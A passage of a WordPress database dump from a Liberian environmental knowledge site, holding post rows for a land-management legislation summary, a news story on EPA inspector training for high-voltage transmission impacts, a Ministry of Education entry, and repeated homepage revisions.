15:08:44','2021-09-29 15:08:44','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4448',67,'document','',0),(4449,42,'2021-09-29 15:07:27','2021-09-29 15:07:27','','land management','','inherit','open','closed','','land-management','','','2021-09-29 15:07:27','2021-09-29 15:07:27','',4448,'https://ekmsliberia.info/wp-content/uploads/2021/09/land-management.png',0,'attachment','image/png',0),(4450,42,'2021-09-29 15:07:51','2021-09-29 15:07:51','','Land Management','','inherit','open','closed','','land-management-2','','','2021-09-29 15:07:51','2021-09-29 15:07:51','',4448,'https://ekmsliberia.info/wp-content/uploads/2021/09/Land-Management.pdf',0,'attachment','application/pdf',0),(4451,42,'2021-09-29 15:08:44','2021-09-29 15:08:44','The publication is an outcome of a consultancy to produce and distribute updated environmental codes, laws and relevant texts pertaining to the Rio Conventions implementation in Liberia from 2006 to 2019. The Liberia Environmental Protection Agency (LEPA) and United Nations Development Programme (UNDP) is implementing a Global Environment Facility (GEF) funded Cross - Cutting Capacity Development (CCCD) project which aim to support the Government of Liberia strengthen national capacities to meet global environmental obligations with the framework of the sustainable development priorities. The goal of the assessment is to improve the implementation of the three (3) Rio Conventions (United Nations Convention on Biological Diversity, United Nations Framework Convention on Climate Change, and United Nations Convention to Combat Desertification) through development of national capacities to better coordinate and generate information related to the implementation of these Conventions.','Land Management Legislations and Policies of Liberia','','inherit','closed','closed','','4448-revision-v1','','','2021-09-29 15:08:44','2021-09-29 15:08:44','',4448,'https://ekmsliberia.info/?p=4451',0,'revision','',0),(4454,42,'2021-10-12 17:00:00','2021-10-12 17:00:00','<!-- wp:paragraph -->\n<p>Environmental inspectors and representatives of line government ministries, agencies and commissions are undergoing a technical training on how to monitor environmental impacts of high voltage transmission systems in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The environmental and social impacts of High Voltage Transmission Systems (HVTS) are common and range from displacement of local people affecting their livelihood, electromagnetic radiation leading to serious health complications, migration of birds as well as change in agricultural yield thus posing various other health and safety risks depending on existing land use pattern of the project area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the installation of High-Tension Lines (HTLs), loss of forest cover and destruction of wide life habitat are common in certain areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to a release, the installation of HTLs also has the potential for environmental impact on water, soil, and air qualities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Although impacts to some of these environmental matrices may be minimum and delocalized, the net cumulative impact is often significant and spans across a large area of land.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In an effort to mitigate the environmental impacts of HVTS, the Environmental Protection Agency (EPA) with support from the Africa Development Bank (AfDB) on Tuesday, 12 October 2021 commenced a three-day technical training aimed at improving the capacity of 160 environmental inspectors, young scientists and interns to effectively monitor the impacts of HVTS on water, soil, and air qualities along HTLs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of the training, which is taking place at the Ministerial Complex in Congo Town, EPA Executive Director, Prof. Wilson K. Tarpeh lauded the African Development Bank for providing funding, which is being used to enhance the capacity of inspectors and other scientists across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also lauded representatives from the Ministry of Justice, Fire Service, Liberia Drug Enforcement Agency (LDEA) and environmental inspectors stationed across the country for accepting invites to benefit from the training.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh promised to continuously enhance the capacity of environmental technicians and scientists at the EPA, who according to him are among the best in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He appreciated his deputy, Randall M. Dobayou for working with him to put the Agency on par with other EPA in the sub-region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The EPA was kept under the radii. Many persons didn’t know what the EPA is. But, we are doing our best in executing the Agency’s mandates” Prof. Tarpeh said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the program, Jeremiah G. Sokan, National Coordinator of the National Climate Change Secretarial aid the training will offer hands-on training in the use of portable water, air, and soil quality equipment to conduct in situ analysis of these environmental matrices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Sokan disclosed that at the end of the training, beneficiaries will be awarded certificates and EPA badges will also be awarded to environmental inspectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that EPA will distribute the materials procured to the staff in all EPA offices both in the Monrovia and the fifteen counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is expected that these materials will be used by inspectors of the Agency in applying their newly acquired skills to monitor HVTS and other related projects,” Sokan said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA is the arm of the Liberian Government charged with the mandate of ensuring the protection, conservation, monitoring and sustainable use of the environment and its natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency ensures the enforcement of environmental regulations, standards, and guidelines in collaboration with relevant institutions as required by the Environmental Protection and Management Law (EPML) of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental and Social Impact Assessments (ESIA) of projects are conducted by Evaluators or Firms accredited by the Agency but the Agency retains the right to verify submissions and periodically monitor said projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the Agency has a wide range of constraints that limits its ability to effectively monitor projects across the county.</p>\n<!-- /wp:paragraph -->','EPA Trains Environmental Inspectors On How To Monitor Impacts of High Voltage Transmission System','','publish','closed','closed','','epa-trains-environmental-inspectors-on-how-to-monitor-impacts-of-high-voltage-transmission-system','','','2021-10-18 11:18:26','2021-10-18 11:18:26','',0,'https://ekmsliberia.info/?p=4454',149,'post','',0),(4455,42,'2021-10-18 11:15:35','2021-10-18 11:15:35','','','','inherit','open','closed','','pic-for-inspector-story','','','2021-10-18 11:16:18','2021-10-18 11:16:18','',4454,'https://ekmsliberia.info/wp-content/uploads/2021/10/Pic-for-inspector-story.jpeg',0,'attachment','image/jpeg',0),(4456,42,'2021-10-18 11:18:23','2021-10-18 11:18:23','<!-- wp:paragraph -->\n<p>Environmental inspectors and representatives of line government ministries, agencies and commissions are undergoing a technical training on how to monitor environmental impacts of high voltage transmission systems in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The environmental and social impacts of High Voltage Transmission Systems (HVTS) are common and range from displacement of local people affecting their livelihood, electromagnetic radiation leading to serious health complications, migration of birds as well as change in agricultural yield thus posing various other health and safety risks depending on existing land use pattern of the project area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the installation of High-Tension Lines (HTLs), loss of forest cover and destruction of wide life habitat are common in certain areas.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to a release, the installation of HTLs also has the potential for environmental impact on water, soil, and air qualities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Although impacts to some of these environmental matrices may be minimum and delocalized, the net cumulative impact is often significant and spans across a large area of land.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In an effort to mitigate the environmental impacts of HVTS, the Environmental Protection Agency (EPA) with support from the Africa Development Bank (AfDB) on Tuesday, 12 October 2021 commenced a three-day technical training aimed at improving the capacity of 160 environmental inspectors, young scientists and interns to effectively monitor the impacts of HVTS on water, soil, and air qualities along HTLs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of the training, which is taking place at the Ministerial Complex in Congo Town, EPA Executive Director, Prof. Wilson K. Tarpeh lauded the African Development Bank for providing funding, which is being used to enhance the capacity of inspectors and other scientists across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He also lauded representatives from the Ministry of Justice, Fire Service, Liberia Drug Enforcement Agency (LDEA) and environmental inspectors stationed across the country for accepting invites to benefit from the training.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Tarpeh promised to continuously enhance the capacity of environmental technicians and scientists at the EPA, who according to him are among the best in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He appreciated his deputy, Randall M. Dobayou for working with him to put the Agency on par with other EPA in the sub-region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The EPA was kept under the radii. Many persons didn’t know what the EPA is. But, we are doing our best in executing the Agency’s mandates” Prof. Tarpeh said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the program, Jeremiah G. Sokan, National Coordinator of the National Climate Change Secretarial aid the training will offer hands-on training in the use of portable water, air, and soil quality equipment to conduct in situ analysis of these environmental matrices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Sokan disclosed that at the end of the training, beneficiaries will be awarded certificates and EPA badges will also be awarded to environmental inspectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that EPA will distribute the materials procured to the staff in all EPA offices both in the Monrovia and the fifteen counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is expected that these materials will be used by inspectors of the Agency in applying their newly acquired skills to monitor HVTS and other related projects,” Sokan said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA is the arm of the Liberian Government charged with the mandate of ensuring the protection, conservation, monitoring and sustainable use of the environment and its natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Agency ensures the enforcement of environmental regulations, standards, and guidelines in collaboration with relevant institutions as required by the Environmental Protection and Management Law (EPML) of the Republic of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental and Social Impact Assessments (ESIA) of projects are conducted by Evaluators or Firms accredited by the Agency but the Agency retains the right to verify submissions and periodically monitor said projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the Agency has a wide range of constraints that limits its ability to effectively monitor projects across the county.</p>\n<!-- /wp:paragraph -->','EPA Trains Environmental Inspectors On How To Monitor Impacts of High Voltage Transmission System','','inherit','closed','closed','','4454-revision-v1','','','2021-10-18 11:18:23','2021-10-18 11:18:23','',4454,'https://ekmsliberia.info/?p=4456',0,'revision','',0),(4457,42,'2021-10-18 11:47:09','2021-10-18 11:47:09','<p class=\"no_stripe\">The mission of the Ministry of Education is to provide quality education for all and prepare future leaders who are capable of handling the task of nation building, protecting our national heritage and enhancing the socio-economic growth and development for the sustenance of the Liberian state.</p>\r\n&nbsp;','Ministry of Education','','publish','closed','closed','','ministry-of-education','','','2021-10-18 12:06:18','2021-10-18 12:06:18','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=4457',3,'institution','',0),(4459,42,'2021-10-18 11:40:50','2021-10-18 11:40:50','','MOE logo','','inherit','open','closed','','moe-logo','','','2021-10-18 12:06:18','2021-10-18 12:06:18','',4457,'https://ekmsliberia.info/wp-content/uploads/2021/10/MOE-logo.png',0,'attachment','image/png',0),(4460,42,'2021-10-18 11:51:00','2021-10-18 11:51:00','','MOE Sidebar','','publish','closed','closed','','moe-sidebar','','','2021-10-18 11:52:00','2021-10-18 11:52:00','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=4460',0,'sidebar','',0),(4462,42,'2021-10-18 11:47:09','2021-10-18 11:47:09','','Ministry of Education','','inherit','closed','closed','','4457-revision-v1','','','2021-10-18 11:47:09','2021-10-18 11:47:09','',4457,'https://ekmsliberia.info/?p=4462',0,'revision','',0),(4463,42,'2021-10-18 11:49:55','2021-10-18 11:49:55','<p class=\"no_stripe\">The mission of the Ministry of Education is to provide quality education for all and prepare future leaders who are capable of handling the task of nation building, protecting our national heritage and enhancing the socio-economic growth and development for the sustenance of the Liberian state.</p>\n&nbsp;','Ministry of Education','','inherit','closed','closed','','4457-autosave-v1','','','2021-10-18 11:49:55','2021-10-18 11:49:55','',4457,'https://ekmsliberia.info/?p=4463',0,'revision','',0),(4465,42,'2021-10-18 12:03:30','2021-10-18 12:03:30','','MOE','','inherit','open','closed','','moe','','','2021-10-18 12:03:30','2021-10-18 12:03:30','',4457,'https://ekmsliberia.info/wp-content/uploads/2021/10/MOE.png',0,'attachment','image/png',0),(4466,42,'2021-10-18 12:06:18','2021-10-18 12:06:18','<p class=\"no_stripe\">The mission of the Ministry of Education is to provide quality education for all and prepare future leaders who are capable of handling the task of nation building, protecting our national heritage and enhancing the socio-economic growth and development for the sustenance of the Liberian state.</p>\r\n&nbsp;','Ministry of Education','','inherit','closed','closed','','4457-revision-v1','','','2021-10-18 12:06:18','2021-10-18 12:06:18','',4457,'https://ekmsliberia.info/?p=4466',0,'revision','',0),(4467,42,'2021-10-21 20:42:54','2021-10-21 20:42:54','','national legislature','','inherit','open','closed','','national-legislature','','','2021-10-21 20:42:54','2021-10-21 20:42:54','',1590,'https://ekmsliberia.info/wp-content/uploads/2019/11/national-legislature.png',0,'attachment','image/png',0),(4468,42,'2021-10-22 12:06:36','2021-10-22 12:06:36','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-10-22 12:06:36','2021-10-22 12:06:36','',9,'https://ekmsliberia.info/?p=4468',0,'revision','',0),(4469,42,'2021-10-22 12:06:36','2021-10-22 12:06:36','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-10-22 12:06:36','2021-10-22 12:06:36','',9,'https://ekmsliberia.info/?p=4469',0,'revision','',0),(4470,42,'2021-10-22 12:06:37','2021-10-22 12:06:37','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"231\">Acts</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by 